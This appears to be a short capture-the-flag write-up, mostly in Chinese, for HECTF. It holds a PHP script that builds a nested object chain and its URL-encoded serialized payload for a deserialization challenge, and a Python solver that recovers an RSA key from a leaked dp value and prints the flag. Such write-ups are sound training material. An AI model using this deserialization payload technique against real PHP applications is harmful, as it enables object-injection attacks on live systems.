这是签到题
去公众号发flag
ezser
<?php
class QvQ{
public $name;
public $like=0e215962017;
}
class OvO{
public $obj;
}
Class UvU{
public $gaga;
public $lady;
}
Class FvF{
public $name;
}
$a=new QvQ;
$b=new OvO;
$c=new UvU;
$d=new FvF;
$a->name=$c;
$c->gaga=$b;
$b->obj=$d;
echo urlencode(serialize($a));
?>
O%3A3%3A%22QvQ%22%3A2%3A%7Bs%3A4%3A%22name%22%3BO%3A3%3A%22UvU%22%3A2%3A%7Bs%3A4%3A%22gaga%22%3BO%3A3%3A%22OvO%22%3A1%3A%7Bs%3A3%3A%22obj%22%3BO%3A3%3A%22FvF%22%3A1%3A%7Bs%3A4%3A%22name%22%3BN%3B%7D%7Ds%3A4%3A%22lady%22%3BN%3B%7Ds%3A4%3A%22like%22%3Bd%3A0%3B%7D
signin
easy_agent
ezrsa
import gmpy2 as gp
n = 112175479714624818333695420235113121999253705121349034178095395776541578094363845388559590909361312410962099699881132411226346575237836053958453543906356619404909584589523034552316763130953004414064225313165485246176626930538343808535067926125049424274746489884590510228322575593062361327323956355018481606787
e = 65537
dp = 776332078153466902010331807629418087664139388392009242255833676093458381495736233562078206906276100477481877005559333154350072579336625440878501990952449
c = 29903204137287472183084078669621828153098745111154184308805918211775025708195435433119346070335075079723952901344436463613049125728645574344500681384720020052000458282929108115757637347220315188433383691840513855197665647546580597290143994943183285021863890508250103436224410969338201721816727848334445692915
for i in range(1,e):
if(dp*e-1)%i == 0:
if n%(((dp*e-1)//i)+1) == 0:
p=((dp*e-1)//i)+1
q=n//(((dp*e-1)//i)+1)
phi=(q-1)*(p-1)
d=gp.invert(e,phi)
m=pow(c,d,n)
print(m)
print(bytes.fromhex(hex(m)[2:]))
代码来源
(42条消息) RSA的dp泄露 [BUUCTF] RSA2_#_##的博客-优快云博客
HECTF{Youhaven'tlearnedrsayet,haveyou}